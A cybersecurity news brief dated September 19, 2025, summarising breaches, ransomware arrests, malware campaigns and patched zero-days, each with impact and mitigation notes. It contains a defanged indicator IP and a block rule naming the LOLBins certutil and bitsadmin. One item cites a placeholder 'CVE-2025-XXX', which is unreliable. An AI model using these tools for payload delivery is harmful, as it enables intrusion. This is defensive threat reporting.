svoboda.center Logo svoboda.center

Svoboda Cybersecurity Brief September 19, 2025

Private VPN — just $1.2/mo

Two Scattered Spider Members Charged in UK and US

Two UK teens (19 and 18 years old) linked to Scattered Spider were arrested for hacking Transport for London (TfL) and targeting US healthcare firms (SSM Health, Sutter Health). One faces US charges for 120 network intrusions, extorting $115M in ransoms from 47 US entities.
Impact: Major financial and operational disruption to critical infrastructure.
Mitigation: Strengthen MFA, monitor for social engineering, and enforce least-privilege access.
Source: DataBreaches.net

Survival Flight Suffers Second Breach in Under a Year

The medical transport firm Survival Flight reported a July 2025 breach exposing patient names, addresses, and health insurance data. Hackers (WorldLeaks) claimed 2.8 TB of stolen files. This follows an October 2024 ransomware incident affecting 10,989 patients.
Impact: Repeated healthcare breaches risk patient safety and data integrity.
Mitigation: Audit post-breach safeguards, segment networks, and enforce zero-trust policies.
Source: DataBreaches.net

SystemBC Malware Exploits Unpatched VPS Servers

The SystemBC proxy botnet infects vulnerable VPS servers (avg. 20 unpatched flaws per server) to route malicious traffic for ransomware gangs. Operates 1,500 daily bots, fueling services like REM Proxy and Shopsocks5.
Impact: High-volume proxy traffic enables ransomware, credential theft, and evasion.
Mitigation: Patch critical VPS vulnerabilities (CVE-2025-XXX), monitor for unusual traffic.
Source: BleepingComputer

Google Patches Sixth Chrome Zero-Day (CVE-2025-10585)

A type confusion flaw in V8 JavaScript engine (CVE-2025-10585) was exploited in attacks, per Google TAG. Fixed in Chrome 140.0.7339.185/.186. Likely tied to spyware campaigns.
Impact: Remote code execution via crafted HTML.
Mitigation: Update Chrome immediately; disable outdated extensions.
Source: BleepingComputer

SonicWall Firewall Configurations Exposed in Breach

Hackers accessed backup firewall configs (encrypted credentials) for <5% of customers via brute-force attacks. SonicWall urges password resets and VPN key rotations.
Impact: Potential firewall takeover if decrypted.
Mitigation: Import fresh configs, disable exposed VPNs, and audit logs.
Source: The Hacker News

Lotte Card Hack Exposes 3 Million Users in South Korea

Attackers stole 200GB of financial data (virtual payment codes, transaction logs) from Lotte Card’s online payments server (July–Aug 2025). Largest breach in South Korea this year.
Impact: Financial fraud and identity theft risks.
Mitigation: Monitor transactions, enforce payment gateway MFA.
Source: DataBreaches.net

Microsoft Disrupts RaccoonO365 Phishing Service

Microsoft seized 338 domains linked to RaccoonO365, a Nigerian-run service targeting 20+ US healthcare orgs with fake Microsoft 365 login pages.
Impact: Credential theft and lateral movement in healthcare.
Mitigation: Deploy conditional access policies, educate on phishing.
Source: DataBreaches.net

CountLoader Malware Fuels Russian Ransomware Gangs

A new multi-version loader (.NET, PowerShell, JS) delivers Cobalt Strike, PureHVNC RAT for LockBit/Qilin affiliates. Targets Ukraine via phishing PDFs.
Impact: Post-exploitation access and data exfiltration.
Mitigation: Block LOLBins (certutil/bitsadmin), monitor Music folder.
Source: The Hacker News

SilentSync RAT Hidden in PyPI Packages

Malicious PyPI packages (sisaws, secmeasure) dropped SilentSync RAT, stealing browser data (Chrome/Firefox) and enabling screenshots/file exfiltration.
Impact: Supply chain compromise via developer tooling.
Mitigation: Scan for IOCs (200.58.107[.]25), audit Python dependencies.
Source: The Hacker News

Tiffany Gift Card Data Breach

Luxury retailer Tiffany & Co. disclosed a May 2025 breach exposing gift card PINs, sales data for 2,500+ customers. Possibly linked to Scattered Spider’s Salesforce attacks.
Source: SecurityWeek

RevengeHotels Deploys AI-Generated Malware

The TA558 group now uses AI-generated JS/PowerShell scripts to deploy VenomRAT in hotels (Brazil focus). Infects via USB drives (My Pictures.exe).
Impact: Persistent access to guest payment systems.
Mitigation: Block USB executables, train staff on invoice scams.
Source: SecurityWeek

GhostAction Attack Compromised PyPI Tokens

3,300+ secrets (npm, AWS, DockerHub) stolen via malicious GitHub Actions. PyPI revoked tokens; no malware was published.
Impact: Potential supply chain hijacking.
Mitigation: Migrate to short-lived “Trusted Publishers” tokens.
Source: BleepingComputer

Medical Associates of Brevard Breach Impacts 246K

BianLian ransomware stole PHI, HR records in January 2025. Attackers had access for weeks before detection.
Source: SecurityWeek

WatchGuard Fixes Critical Firewall Flaw (CVE-2025-9242)

An IKEv2 VPN OOB write bug in Fireware OS allows RCE. Patch versions: 12.3.1_Update3, 12.5.13.
Impact: Unauthenticated remote code execution.
Mitigation: Update or disable IKEv2 VPN dynamic peers.
Source: BleepingComputer

Share this brief: https://svo.bz/uZW2

If you want to support us, you can donate here: Donate